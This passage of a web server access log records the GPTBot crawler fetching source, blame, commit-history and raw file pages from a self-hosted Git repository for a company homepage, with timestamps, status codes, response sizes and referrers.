+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 1657442] [Gzip 11.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets" [Client 74.7.227.38] [Length 10756] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" +[17/Feb/2026:13:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services" [Client 74.7.227.38] [Length 9917] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" [Client 74.7.227.38] [Length 10561] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt" [Client 74.7.227.38] [Length 9909] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/letsencrypt" +[17/Feb/2026:13:03:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" +[17/Feb/2026:13:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" [Client 74.7.227.38] [Length 11453] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets" [Client 74.7.227.38] [Length 10507] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets" +[17/Feb/2026:13:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" [Client 74.7.227.38] [Length 10973] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" [Client 74.7.227.38] [Length 11478] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" [Client 74.7.227.38] [Length 11608] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" [Client 74.7.227.38] [Length 10170] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets" +[17/Feb/2026:13:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets" [Client 74.7.227.38] [Length 9855] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets" +[17/Feb/2026:13:03:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services" +[17/Feb/2026:13:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" +[17/Feb/2026:13:03:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" +[17/Feb/2026:13:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" [Client 74.7.227.38] [Length 11886] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:03:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" [Client 74.7.227.38] [Length 9860] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" +[17/Feb/2026:13:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" +[17/Feb/2026:13:03:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" [Client 74.7.227.38] [Length 10727] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" +[17/Feb/2026:13:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" +[17/Feb/2026:13:03:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" +[17/Feb/2026:13:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images" +[17/Feb/2026:13:03:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" [Client 74.7.227.38] [Length 10826] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" +[17/Feb/2026:13:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" [Client 74.7.227.38] [Length 10777] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" +[17/Feb/2026:13:03:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" +[17/Feb/2026:13:03:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.tsx" +[17/Feb/2026:13:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" [Client 74.7.227.38] [Length 11205] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" +[17/Feb/2026:13:03:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" +[17/Feb/2026:13:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" +[17/Feb/2026:13:04:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js" [Client 74.7.227.38] [Length 10523] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js" +[17/Feb/2026:13:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js" +[17/Feb/2026:13:04:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" [Client 74.7.227.38] [Length 12808] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/js/script.js" +[17/Feb/2026:13:04:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" [Client 74.7.227.38] [Length 10171] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets" +[17/Feb/2026:13:04:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:04:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:04:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 7733853] [Gzip 11.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:04:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" +[17/Feb/2026:13:04:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" [Client 74.7.227.38] [Length 10769] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" [Client 74.7.227.38] [Length 11050] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 10855] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:04:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 10856] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:04:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:04:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" +[17/Feb/2026:13:04:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:13:04:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 10908] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js/script.js" [Client 74.7.227.38] [Length 15588] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js" +[17/Feb/2026:13:04:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" [Client 74.7.227.38] [Length 10418] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data" +[17/Feb/2026:13:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" [Client 74.7.227.38] [Length 10698] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" +[17/Feb/2026:13:04:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" +[17/Feb/2026:13:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" +[17/Feb/2026:13:04:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" +[17/Feb/2026:13:04:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" [Client 74.7.227.38] [Length 8206005] [Gzip 11.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/bearing.png" +[17/Feb/2026:13:04:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 1094877] [Gzip 12.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 